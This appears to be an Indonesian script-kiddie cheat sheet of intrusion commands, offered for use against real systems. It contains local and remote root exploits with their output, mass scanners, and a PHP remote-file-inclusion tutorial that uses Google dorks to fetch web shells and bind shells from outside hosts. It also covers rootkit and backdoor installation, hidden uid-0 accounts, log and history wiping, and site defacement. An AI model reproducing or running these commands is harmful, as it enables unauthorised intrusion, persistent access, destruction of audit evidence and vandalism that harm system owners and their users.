tar -zxvf patch.tar.gz
cd patch
./sexy
BERSIH JEJAK:manual
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
==================================
LOCAL ROOT http://www.geocities.com/lifron/local.tar.gz
2.wget http://kelik-pelipur-lara.org/tools/local.tar.gz
cd local
chmod 755 *
./local.sh
./lconfex -p
./lconfex -f
sh ./handy.sh 0xbffffb24 0xbffff661
——————-
Add user dlm Root:
——————-
1.
/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/.kuntua
passwd -d kuntua
/usr/sbin/useradd moes -g wheel -s /bin/bash -d /etc/.moes
passwd -d moes
/usr/sbin/useradd cakmoes -g wheel -s /bin/bash -d /etc/.cakmoes
passwd -d cakmoes
2.
/usr/sbin/adduser jabriks -g root -d /var/jabriks
passwd -d jabriks
/usr/sbin/adduser mus -g root -d /var/mus
passwd -d mus
/usr/sbin/useradd tondano -g wheel -s /bin/bash -d /home/.tondano
passwd tondano75
—————————-
**add user accses root
—————————-
/usr/sbin/useradd bash -g root -u 0 -d /
passwd -d tondano
/usr/sbin/useradd jabrik -g root -u 0 -d /
passwd -d jabrik
/usr/sbin/useradd cakmoes -g root -u 0 -d /
passwd -d cakmoes
———–
Del User
———–
/usr/sbin/userdel -r [namauser]
PENTING
kalo so dapat ROOT
ketik id
uname -a
abis itu
ketik cd /tmp
—————–
——————————————–
ngeROOT ssh LINUX port 22:
wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz
tar -zxvf grabbb-0.1.0.tar.gz.tar.gz
gcc -o grabbb grabbb.c
cd grabbb
./grabbb -a IP -b IP port co:./grabbb -a 202.1.1.1 -b 202.1.1.1 22
66.201.243.210
——————————————–
wget www.suckmyass.org/ssh-scan8.tar.gz
tar
cd ssh-scan8
./r00t 203.20 -d 4 <— scan massal SSH ./r00t 203.20 -d 2 <— scan massal FTP ./r00t 203.20 -d 3 <— scan massal FTP ./r00t 134.7. -d 4 ——————————————– ngeROOT utk OS SCO : wget www.renjana.com/sco ./sco IP ——————————————– pasang BackDoor: 1. id uname -a cd /tmp wget http://packetstormsecurity.org/UNIX/penetration/rootkits/tk.tgz ls -al tar -zxvf tk.tgz cd tk ./t0rn kuntua 7000 ——————————————– LINKS: http://www.eviltime.com/download/exploit www.cahcepu.net www.vibrasi.net www.paktani.tk www.sisilainrevolt.org www.sitiung.com www.utay-doyan.cc www.atstake.com/research/redirect.html?users/10pht/nc110.tgz ======= Usage: ./sambal [-bBcCdfprsStv] [host] -b bruteforce (0 = Linux, 111 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2) -B bruteforce steps (defaulllt = 300) -c connectback ip address -C max childs for scan/bruttteforce mode (default = 40) -d bruteforce/scanmode delaaay in micro seconds (default = 100000) -f force -p port to attack (default = 139) -r return address -s scan mode (random) -S scan mode -t presets (0 for a list) -v verbose mode CONTOH: [esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be) ————————————————————– + Scan mode. + [192.168.0.3] Samba + [192.168.0.10] Windows + [192.168.0.35] Windows + [192.168.0.36] Windows + [192.168.0.37] Windows … + [192.168.0.133] Samba ./sambal -b 0 -v =========== Usage: ./mayday-linux -t [-pa] -t target The host to attack. -a password Default password is “chaaangeme”. -p port Default port is 8001. ================ /usr/sbin/adduser httpd passwd httpd ============ PACTH SAMBA = root@redeye samba]# /etc/init.d/smb stop = Shutting down SMB services: [ OK ] = Shutting down NMB services: [ OK ] = [root@redeye root]# cd /etc/samba = [root@redeye samba]# wget http://master.samba.org/samba/ftp/patches/patch-2.2.8-2.2.8a.diffs.gz = [root@redeye samba]# gunzip patch-2.2.8-2.2.8a.diffs.gz = [root@redeye samba]# patch -p1 < patch-2.2.8-2.2.8a.diffs = [root@redeye samba]# /etc/init.d/smb start ======================= ======= VHOST = edit di httpd.conf = tinggal tambah no = kong di named.conf = 1. wget http://apache.towardex.com/httpd/apache_1.3.27.tar.gz = 2. tar zxvf apache_1.3.27.tar.gz = 3. cd apache_1.3.27 = 4. ./configure = 5. make = 6. make install = 7. /usr/local/apache/bin/apachectl start = cd /usr/local/apache/conf/httpd.conf = contoh = echo “” > httpd.conf
= echo “ServerName www.Cmaster4.net” > httpd.conf
= echo “DocumentRoot /home/iptek/public_html” > httpd.conf
= echo “ScriptAlias /cgi-bin /www/Cmaster4.net/cgi-bin” > httpd.conf
= echo “” >> httpd.conf
= ——————————
= ——————————
= ——————————
= find |grep name.conf
= echo “zone “i-am.Cmaster4.net” IN {” > named.conf
= echo “type master; > named.conf
= echo “file “/var/named/named.local”;” > named.conf
= echo “allow-update { none; };” > named.conf
= echo “};” >> named.conf
= nah setelah itu kamu restart named dan httpd nya
= /etc/init.d/named stop
= /etc/init.d/named start
= /etc/init.d/httpd stop
= /etc/init.d/httpd start
= atau
= /etc/rc.d/init.d/named stop
= /etc/rc.d/init.d/named start
= /etc/rc.d/init.d/httpd stop
= /etc/rc.d/init.d/httpd start
= atau kalau bukan di /etc/init.d/ coba ketik find |grep named dan berikutnya find |grep httpd
=================================================================
wget http://www.geocities.com/lifron/Pre-psyBNC.tgz; tar -zxvf Pre-psyBNC.tgz; cd psybnc; make; wget http://www.geocities.com/lifron/psybnc.conf.6669.txt; mv psybnc.conf.6669.txt .sh; wget http://www.geocities.com/lifron/kik; chmod +x kik; ./kik “/usr/sbin/httpd -DHAVE_PROXY -DHAVE” ./psybnc .sh; cd ..; rm -rf Pre-psyBNC.tgz
====================
EGGDROP
====================
= wget www.geocities.com/lifron/eggdrop.tar.gz; tar -zxvf eggdrop.tar.gz; cd eggdrop; wget www.geocities.com/lifron/bot.conf; cd scripts; wget www.geocities.com/lifron/netgate.tcl; cd ..
= ./eggdrop -mnt bot.conf
./eggdrop -m bot.conf
==============
My_eGallery from K-159
==============
1.pasangin bindtty
2. kalo ggk jalan bindtty nya pasangin shell.php
3.kalo ggk jalan juga coba cgi-telnet
contohnya
http://livron.port5.com/mail.php <———ini source shell misalnya: http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php kalo gak bisa kita cari folder yg bisa buat id wwrun utk wget kalo bisa… buka: http://www.target.org/modules/My_eGallery/public/mail.php ======== pasang bindtty wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd baru bikin file exekusi chmod 755 /tmp/httpd ============ cgi-telnet mencari folder cgi-binnya >> disitulah kita Taro cgi-telnetnya
biasanya folder cgi-bin ada di folder …/www
tp kebanyakan webserver
tiap user di beri folder cgi-bin masing2
contoh:
/home/users/russisk/html/modules/My_eGallery/public <——td kan kita ada di folder ini http://www.russisk.org/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=ls%20-al%20/home/users/russisk kliatan cgi-bin-nya cd ke folder cgi-bin baru wget ke situ Contoh: wget http://livron.port5.com/kuntua.pl -O /home/users/russisk/cgi-bin/cgi.pl kalo bisa lanjut ke chmod 755 /home/users/russisk/cgi-bin/cgi.pl <——-agar file cgi.pl nya jd file eksekusi kalo bisa tinggal buka: www.target.org/cgi-bin/cgi.pl port 7788 ============ end wget www.geocities.com/lifron/psy.tar.gz; tar -zvxf psy.tar.gz cd .psy ./config KuNTuA 6669 ./fuck ./run =========== Tittle : SUPER KIDDIES HACKING: “PHP SUPER BUGS” Author : K-159 Greetz : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew, Chanel : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel Email : eufrato@linuxmail.org Reference : security-corporations.com, security-focus.com, bugs-traq, google.com ——————————————————————————————————– Prolog : i wrote this tutorial just for my dearest brother “Lieur-Euy” thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. ‘n we will rock the world again 1. allinurl filename bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?filename=*”. keyword ‘*.php’ bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?filename=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “ kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 2. allinurl content bugs content ini targetnya dapat kita cari dengan keyword “allinurl:*.php?content=”. keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?content=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: ” http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “ kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 3. allinurl page bugs page ini targetnya dapat kita cari dengan keyword “allinurl:*.php?page=*”. ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?page=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 4. allinurl link bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?link=*”. keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?link=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 5.allinurl file bugs file ini targetnya dapat kita cari dengan keyword “allinurl:*.php?file=*”. ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?file=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan : I. install bindtty telnet 1.buat url seperti ini: ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd “ url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd. 2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi: ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd “ 3.eksekusi file httpd tadi : ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd “ 4. buka telnet ke IP target sesuai dg port bindttynya II. install Cgi-telnet 1.buat url seperti ini : ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl “ url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya. 2. buat cgi-telnet test.pl jadi file eksekusi : ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl “ 3. akses cgitelnet kita dengan membuka url : ” http://www.target.com/cgi-bin/test.pl “ masukkan passwordnya “n0fr13″ III. install shell php 1. buat url seperti ini : “http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php “ url diatas utk melakukan wget ke server target dan hasil wget berupa file log.php. bila keluar pesan “permission denied” cari lah folder lain yang bisa untuk wget shell.php kita. 2. akses shell php kita sesuai dengan foldernya : ” http://www.target.com/target/log.php “ IV. Deface http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo “K-159 and crew was touch your system” > test.html
thats all my friends. just try it !!!
Denpasar, 15 january 2004
K-159
Epilog :special thx to my beloved sister “May” for all the spirit, motivations, love, kindness, and all the fire that u give to me.”I love U my dear sister, in the name of Allah”.
bacaan lebih lanjut:
——————–
www.geocities.com/emilroni/hackurl.txt
www.geocities.com/emilroni/google.txt
=======================
=========================================================================================
Title :SUPER KIDDIES HACKING “Super Bugs PHP II”
Author :K-159
Greetz :KuNTuA, Lieur-Euy, pe_es.
Reference :google.com, membres.lycos.fr, security-corporations.com, security-challenge.com
==========================================================================================
Proof of Concept :
==================
kesalahan url pada fopen ( ) function sehingga attacker bisa menginjeksikan script ke server target.
Target :
========
Temukan target nya di google dengan keyword:
1.allinurl:*.php?page=*
2.allinurl:*.php?content=*
3.allinurl:*.php?file=*
4.allinurl:*.php?filename=*
5.allinurl:*.php?link=*
6.allinurl:*.php?view=*
7.allinurl:*.php?sec=*
8.allinurl:*.php?document=*
9.allinurl:*.php?p=*
10.allinurl:*.php?x=*
Exploit:
==========================================================================================
1.http://www.target.com/target.php?page=http://www.geocities.com/inul_asoy/page.txt
2.http://www.target.com/target.php?content=http://www.geocities.com/inul_asoy/content.txt
3.http://www.target.com/target.php?file=http://www.geocities.com/inul_asoy/file.txt
4.http://www.target.com/target.php?filename=http://www.geocities.com/inul_asoy/filename.txt
5.http://www.target.com/target.php?link=http://www.geocities.com/inul_asoy/link.txt
6.http://www.target.com/target.php?view=http://www.geocities.com/inul_asoy/view.txt
7.http://www.target.com/target.php?sec=http://www.geocities.com/inul_asoy/sec.txt
8.http://www.target.com/target.php?documet=http://www.geocities.com/inul_asoy/_document_._txt
9.http://www.target.com/target.php?p=http://www.geocities.com/inul_asoy/p.txt
10.http://www.target.com/target.php?x=http://www.geocities.com/inul_asoy/x.txt
Details Exploit:
==========================================================================================
Upload a file : upload file ke server target
Explore with fopen() function : mencari target yang mengandung fopen pada server target
Execute arbitrary PHP functions : membuat script php ke dalam server target
Execute a system() command : menjalankan command unix/linux di server target
Manager for SQL Server : mengubah settingan data base sql server target
System overviewer (get the root !) : mengintip system server target dan melakukan lokal root
0
TRIK MEMBUAT PSYBNC : =================================================== unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ; cd var/tmp/;
mkdir …. ; cd …. ; wget http://www.geocities.com/lifron/Pre-psyBNC.tgz;
mv Pre-psyBNC.tgz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ;
cd .log ; make; mv psybnc “bash ” ; rm psybnc.conf ; wget http://www.geocities.com/lifron/psybnc.conf.20075.txt;
mv psybnc.conf.20075.txt psybnc.txt ; mv psybnc.txt ” ” ; pwd ; PATH=$PATH:/var/tmp/…./.log/;
“bash ” ” “mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud ;
find |grep psybnc
===================================================
: TRIK MENGHAPUS LOG :
=================================================== echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
=================================================== rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
===================================================
: LOCAL ROOT MANDRAKE :
=================================================== unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd /tmp ; mkdir ” ” ; cd ” ”
1. wget www.geocities.com/lifron/local.tar.gz
2. tar -zxvf local.tar.gz
3. cd local
4. ./lconfex -p
5. ./lconfex -f
6. ./handy.sh 0xbffff625 0xbffff5f1
7.mkdir segfault.eng ; touch segfault.eng/segfault.eng
8. ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
9. id
10. root
11. /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /home/.kuntua
12. echo “tondano::0:0::/.tondano:/bin/bash” >> /etc/passwd
passwd -d kuntua
Changing password for user kuntua
Removing password for user kuntua
passwd: Success
13. Login ke shell terus bersihkan log dan pasang backdoor
14.last |grep kuntua
15. su tondano
16. wget http//www.geocities.com/lifron/remove.c
17. gcc -o r remove.c -DGENERIC
18. ./remove /home/kuntus
19. wget www.geocities.com/lifron/shv4.tar.gz
20. tar -zxvf shv4.tar.gz
21. cd shv4
22. ./setup pass port, misal ./setup gohanz 7788
23. /usr/sbin/userdel -r kuntua
24. cd /var/tmp/” ” <== Bersihkan semua tools 25. Test shell dengan port 7788, login as : root, password : gohanz =================================================== find index.html whereis index.html locate index.html default : cd /var/www/html echo “KuNTuA ToNDaNo Was Here” > index.html
=================================================== cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo “KuNTuA ToNDaNo Was Here” > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
===================================================
BIKIN BACKDOOR
=================================================== echo “kuntua 1979/tcp” >> /etc/services
echo “dial stream tcp nowait root /bin/sh sh -i” >> /etc/inetd.conf kill -HUP 135
telnet dengan port “1979″
=================================================== http://www.rocketpunch-ent.com/masslpd.tar
http://www.rocketpunch-ent.com/bindscan.c
http://www.rocketpunch-ent.com/lucstatdx.c
=================================================== [root@gila /]#rpm -qa | grep samba
samba-client-2.0.7-36
samba-2.0.7-36
samba-common-2.0.7-36
[root@gila /]# arp -n
Address HWtype HWaddress Flags Mask Iface
192.168.0.6 ether 00:08:C7:C2:0F:1B C eth1
192.168.0.4 ether 00:80:5F:0E:B7:28 C eth1
192.168.0.5 ether 00:00:B4:3C:AC:41 C eth1
192.168.0.2 ether 00:C0:4F:94:CC:70 C eth1
192.168.0.3 ether 00:10:5A:71:17:E3 C eth1
192.168.0.1 ether 00:00:21:28:8C:47 C eth1
[root@gila /]# nmblookup -d2 ‘*’ #untuk mendeteksi netbios
Got a positive name query response from 192.168.0.2 ( 192.168.0.2 )
Got a positive name query response from 192.168.0.4 ( 192.168.0.4 )
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Got a positive name query response from 192.168.0.3 ( 192.168.0.3 )
Got a positive name query response from 192.168.0.1 ( 192.168.0.1 )
[root@gila /]# locate findsmb
/usr/bin/findsmb
[root@router /]# findsmb
IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION
—————————————–
192.168.0.1 CYBER1 [CYBER]
192.168.0.2 CYBER2 [CYBER]
192.168.0.3 CYBER3 [CYBER]
192.168.0.4 CYBER4 [CYBER]
192.168.0.5 CYBER5 [CYBER]
[root@gila /]# mkdir /mnt/samba
[root@gila /]# smbclient -L CYBER5
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Password:
Sharename Type Comment
——— —- ——-
A Disk
C Disk
D Disk
E Disk
IPC$ IPC Remote Inter Process Communication
[root@gila /]# smbmount //cyber5/d /mnt/samba/
Password:
[root@gila /]#
[root@gila /]# cd /mnt/samba/
[root@router samba]# ls
ffastun.ffa ffastun.ffo install RECYCLED
ffastun0.ffx ffastun.ffl film win98
[root@gila samba]# cd film/
[root@gila film]# ls
Amy_Lindsay_Forbidden_Sins_01[1].mpeg
=================================================== bash# tar -zxvf grabbb-0.1.0.tar.gz
bash# cd grabbb
bash# gcc -o grabbb grabbb.c
bash# ./grabbb -a 210.10.19.1 -b 210.100.50.1 23
=================================================== gcc sco-pop.c -o sco-pop
./sco-pop www.target.com
/var/adm
=================================================== : BERSIHKAN LOG :
=================================================== ctlog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog
messages -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages
sulog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog
syslog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog
utmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp
utmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx
wtmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp
wtmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx
=================================================== securityfocus.com|rstcorp.com/its4|striker.ottawa.on.ca/~aland/pscan|securiteam.com|www.l0pht.com|insecure.org|rhino9.ml.org|technotronic.com|nmrc.org|cultdeadcow.com|kevinmitnick.com|2600.com|antionline.com|rootshell.com|aol.com|happyhacker.org|lwn.net|slashdot.org|netric.org
=================================================================================================
repsec.com|iss.net|checkpoint.com|infowar.com|
=================================================================================================
li.org|redhat.com|debian.org|linux.org|www.sgi.com|netbsd.org|openbsd.org|linuxtoday.com|freebsd.org|slackware.com|mandrake.com|linuxguruz.org
=================================================================================================
harvard.edu|yale.edu|caltech.edu|stanford.edu|mit.edu|berkeley.edu|oxford.edu|whitehouse.gov|sunsite.unc.edu|
=================================================================================================
http://channels.dal.net/netgate/psybnc2.3.tar.gz|geocities.com/logic_roncep|irc.netsplit.de/networks/DALnet/current.var|psychoid.lam3rz.de/psyBNC2.3.tar.gz|shellcentral.com/downloads/files/psyBNC2.3.1.tar.gz|seputarmalang.com/kayutangan.php|community.core-sdi.com/~juliano|packetstormsecurity.org/0212-exploits/telnetjuarez.c|packetstormsecurity.nl/0209-exploits/openssl-too-open.tar.gz|maskedteam.com/exploit/local.tar.gz|http://ftp.linux.hr/pub/openssh/openssh-2.1.1p4.tar.gz|wget http://www.pupet.net/fiona/sslpupet.tar.gz|
=================================================== 1. wget www.geocities.com/lifron/openssl.tar.gz
2. tar -zxvf openssl.tar.gz
3. ./ssl IP
./ssl 204.145.119.253
=================================================== 1. wget www.geocities.com/lifron/massapache.tar.gz
2. tar -zxvf massapache.tar.gz
3. cd massapache
4. ./massossl 211 443 10
=================================================== 1. wget http://www.geocities.com/lifron/openssl-too-open.tar.gz
2. tar -zxvf openssl-too-open.tar.gz
3. cd openssl-too-open
4. ./openssl-too-open
./openssl-too-open -a 0×15 -v 212.70.224.129
=================================================== 1. wget www.geocities.com/lifron/shv4.tar.gz
2. tar xzf shv4.tar.gz
3. cd shv4
4. ./setup port passwd
./setup 7788 35b4tu
================================================ 1. wget http://www.geocities.com/lifron/massplor.tar.gz
2. tar -zxvf massplor.tar.gz
3. cd massplo
4. ./massplo IP -d 8
./massplo 210.10 -d 8
================================================ 1. wgetwww.geocities.com/lifron/mapache2x.gz
2. tar -zxvf mapache2x.gz
3. cd slamet
4. ./apache 208.134.131.49
./massossl 80 443 13
./mapache 443 210.10
================================================ 1. wget http://phaty.org/ptrace-kmod.c.txt
2. mv ptrace-kmod.c.txt ptrace-kmod.c
3. gcc -o ptrace-kmod ptrace-kmod.c
4. ./ptrace-kmod
================================================ 1. wget http://netric.org/exploit/sambal.c
2. gcc -o sambal sambal.c
3. ./sambal -d 0 -C 60 -S IP <== scanning ./sambal -d 0 -C 60 -S IP | grep samba ./sambal -b 0 -v IP <=== attack ================================================ SecureCRT: http://www.vandyke.com/ TTSSH: http://www.zip.com.au/~roca/ttssh.html PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty.html SecureShell: http://public.srce.hr/~cigaly/ssh/ ================================================ DEFACE ================================================ find index.html whereis index.html locate index.html default : cd /var/www/html echo “KuNTuA Was Here” > index.html
================================================ cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo “KuNTuA Was Here” > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
================================================ Install WGET
================================================ 1. coba ketik: cat /etc/issue, untuk melihat Sistem Operasinya
2. ketik: ftp ftp.rpmfind.net
3. login : anonymous
4. cd linux/redhat/updates/7.0/en/os/
5. cd i386
6. get wget-1.8.2-4.70.i386.rpm
7. quit dari ftp
8. Proses Peng-Instalan
rpm -ivh wget-1.8.2-4.70.i386.rpm
http://www.rpmfind.net/linux/rpm2html/search.php?query=wget&submit=Search+…&system=redhat&arch=
=================================================================================================
wget http://202.158.16.157/ssh.diff
wget http://www.geocities.com/lifron/openssh-3.4p1.tar.gz
tar -zxvf openssh-3.5p1.tar.gz
cp ssh.diff openssh-3.5p1.tar.gz
cd openssh-3.5p1
patch -p < ssh.diff ./configure make ssh ./ssh -l root ./ssh -l root 66.136.37.101 ./ssh -l root 66.149.178.214 ================================================ : COMMAND ADDUSER : ================================================ /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/kuntua /usr/sbin/useradd tondano -u 0 -d / passwd -d kuntua Changing password for user kuntua Removing password for user kuntua passwd: Success passwd -d tondano Changing password for user tondano Removing password for user tondano passwd: Success ================================================ passwd kuntua New UNIX password: kuntua75 Retype new UNIX password: kuntua75 Changing password for user kuntua passwd: all authentication tokens updated successfully password tondano New UNIX password: kuntua75 Retype new UNIX password: kuntua75 Changing password for user tondano passwd: all authentication tokens updated successfully ================================================ ================================================ OPENSSL-TOO-OPEN ================================================ ./openssl -a 0×15 -v 61.220.53.91 : openssl-too-open : OpenSSL remote exploit by Solar Eclipse : Opening 30 connections Establishing SSL connections -> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0×80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0×80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0×80e1638
: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0×80e1638 start_addr: 0×80e1578 SHELLCODE_OFS: 208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell…
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a;id
bash-2.05$ Linux Mandrake release 8.0 (Traktopel) for i586
bash-2.05$ Linux proxy2.rayongwit.net 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown
bash-2.05$ uid=48(apache) gid=48(apache) groups=48(apache)
================================================ : MARI KITA MAINKAN ROOTNYA :
================================================ unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0
cd /tmp ; mkdir … ; cd ….
wget www.geocities.com/lifron/local.tar.gz
tar -zxvf local.tar.gz
cd local
./lconfex -p
./lconfex -f
./handy.sh 0xbffff625 0xbffff5f1
GOT IT! Your magic number is : 792
Now create a dir ’segfault.eng’ and touch a file named ’segfault.eng’ in it.
Then exec “./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792″ to get rootshell
*hint* : try play with -b if not succeed. [ n = 0..4 ]
ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 -b 1
Good Luck d0inks!
mkdir segfault.eng; touch segfault.eng/segfault.eng
./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
id
uid=0(root) gid=48(apache) groups=48(apache)
================================================ /usr/sbin/useradd mails -g wheel -s /bin/bash -d /home/mails
echo “apache::0:0::/mails:/bin/bash” >> /etc/passwd
passwd -d mails
Changing password for user mails
Removing password for user mails
passwd: Success
login ke shell
last | grep mails
su apache
mkdir /var/tmp/” ”
cd /var/tmp/” ”
wget http.phaty.org/remove.c.txt ; mv remove.c.txt remove.c
gcc -o r remove.c -DGENERIC
./remove /home/mails
wget www.radikal.org/backdoor.tar.gz
tar xzf backdoor.tar.gz
./setup 35b4tud1n91n 7788
/usr/sbin/userdel -r mails
/usr/sbin/userdel -r apache
cd /var/tmp/” ” <== del semua tools test shell with port 7788 and password 35b4tud1n91n ================================================ [Langkah Hapus Log I] ================================================ export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ================================================ [Langkah Hapus Log I] ================================================ rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r ================================================ wget http://brutalside.host.sk/tools/term chmod +x term ./term lonthe123 ================================================ wget http://brutalside.host.sk/tools/ftp.tgz 